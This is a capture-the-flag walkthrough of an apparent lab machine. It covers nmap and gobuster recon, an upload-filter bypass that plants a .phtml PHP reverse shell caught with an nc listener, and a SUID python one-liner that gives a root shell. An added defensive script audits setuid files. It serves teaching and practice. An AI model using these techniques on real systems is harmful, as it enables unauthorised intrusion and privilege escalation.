Recon
To better understand the machine we start with a simple recon using the following command:
sudo nmap -sV -A -T4 10.10.177.103 -oN nmap_results.txt
# Obtaining the following output:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4ab9160884c25448ba5cfd3f225f2214 (RSA)
| 256 a9a686e8ec96c3f003cd16d54973d082 (ECDSA)
|_ 256 22f6b5a654d9787c26035a95f3f9dfcd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: HackIT - Home
|_http-server-header: Apache/2.4.29 (Ubuntu)
These results show we have:
- SSH server: we might be able to use this if we find a private key, or brute-force the password if we find a list of users;
- HTTP server: we should explore the website to find potential file uploads or logins we can exploit, or to create a user list.
Directory Search
Since this process can take a while, we should start it before exploring the website. We do as follows:
gobuster dir -t 64 -u http://10.10.177.103:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt
Access Website
We consult the homepage and the robots page; both fail to provide any additional information.
Homepage
Robots
Gobuster Results
After a while our command ends with the following results:
/uploads (Status: 301) [Size: 316] [--> http://10.10.177.103/uploads/]
/css (Status: 301) [Size: 312] [--> http://10.10.177.103/css/]
/js (Status: 301) [Size: 311] [--> http://10.10.177.103/js/]
/panel (Status: 301) [Size: 314] [--> http://10.10.177.103/panel/]
/server-status (Status: 403) [Size: 278]
Getting Access
With the recon finalized, we understand there is an option to obtain a reverse shell using a PHP script.
Panel
This page allows us to upload a file, so we should prepare a PHP reverse shell, as it is an Apache server, which commonly uses PHP. The upload fails, as the panel does not accept .php files.
We can now try several extensions until one works (e.g. php3, php4, phtml, etc.), and we are able to succeed using phtml.
Obtaining shell
We can now launch our listener with nc -lvnp 8080
and obtain a shell by requesting the file we uploaded through 10.10.177.103/uploads.
Find Flag
To find the flag we can use find / -name "user.txt" 2>/dev/null
and use cat to read its content.
Privilege Escalation
SUID
Our first instinct was to find these types of files using:
find / -type f -perm -04000 -ls 2>/dev/null
787696 44 -rwsr-xr-- 1 root messagebus 42992 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
787234 112 -rwsr-xr-x 1 root root 113528 Jul 10 2020 /usr/lib/snapd/snap-confine
918336 100 -rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
787659 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
787841 428 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
787845 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
787467 20 -rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
787290 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap
787288 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newgidmap
787086 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
266770 3580 -rwsr-sr-x 1 root root 3665768 Aug 4 2020 /usr/bin/python
...
...
We see that python is SUID root (-rwsr-sr-x) and can be exploited to escalate our privileges
using /usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
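The defender's counterpart to the SUID listing above, added here as an example and not part of the original writeup: a Python script that parses `find -ls` output and flags setuid files that are interpreters or that are missing from a recorded baseline. The sample lines are copied from the listing above plus one constructed path (/opt/backup/dumper); the BASELINE set is an assumption standing in for what an administrator would record on a clean install.

```python
import re
from typing import List, Set, Tuple

# Constructed sample: three lines copied from the find -ls listing above, plus one
# hypothetical path (/opt/backup/dumper) that a baseline would not contain.
SAMPLE_LISTING = """\
787234 112 -rwsr-xr-x 1 root root 113528 Jul 10 2020 /usr/lib/snapd/snap-confine
787086 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
266770 3580 -rwsr-sr-x 1 root root 3665768 Aug 4 2020 /usr/bin/python
999999 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /opt/backup/dumper
...
"""

# Assumed baseline: the setuid paths an administrator recorded on a clean install.
BASELINE: Set[str] = {"/usr/lib/snapd/snap-confine", "/usr/bin/chsh"}

# Interpreters hand any caller a shell as the file owner when setuid, so they
# are reported even if someone has added them to the baseline.
INTERPRETERS = {"python", "perl", "ruby", "bash", "sh", "dash", "php", "node", "lua"}

# find -ls fields: inode blocks perms nlinks owner group size month day year|time path
FINDLS_RE = re.compile(
    r"^\s*\d+\s+\d+\s+(\S{10,11})\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\S+\s+\d+\s+\S+\s+(.+)$"
)


def audit(listing: str, baseline: Set[str]) -> List[Tuple[str, str]]:
    """Return (path, reason) for each setuid/setgid entry that needs review."""
    findings = []
    for line in listing.splitlines():
        m = FINDLS_RE.match(line)
        if not m:  # skips blank lines and the "..." elisions
            continue
        perms, owner, group, path = m.groups()
        setuid = perms[3] in "sS"  # 's' in the owner execute slot
        setgid = perms[6] in "sS"  # 's' in the group execute slot
        if not (setuid or setgid):
            continue
        # python3.6 -> python, so versioned interpreter names are caught too
        base = re.sub(r"[\d.]+$", "", path.rsplit("/", 1)[-1])
        if base in INTERPRETERS:
            findings.append((path, f"interpreter with setuid bit: any local user becomes {owner}"))
        elif path not in baseline:
            findings.append((path, f"setuid/setgid file not in baseline (owner {owner}:{group})"))
    return findings


if __name__ == "__main__":
    for path, reason in audit(SAMPLE_LISTING, BASELINE):
        print(f"{path}: {reason}")
```

On a real host, feed it the output of the same find command the writeup uses and diff the result against the previous run as part of routine configuration checks.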
Obtaining final flag
To find the flag we can use find / -name "root.txt" 2>/dev/null
and use cat to read its content.
Kanelao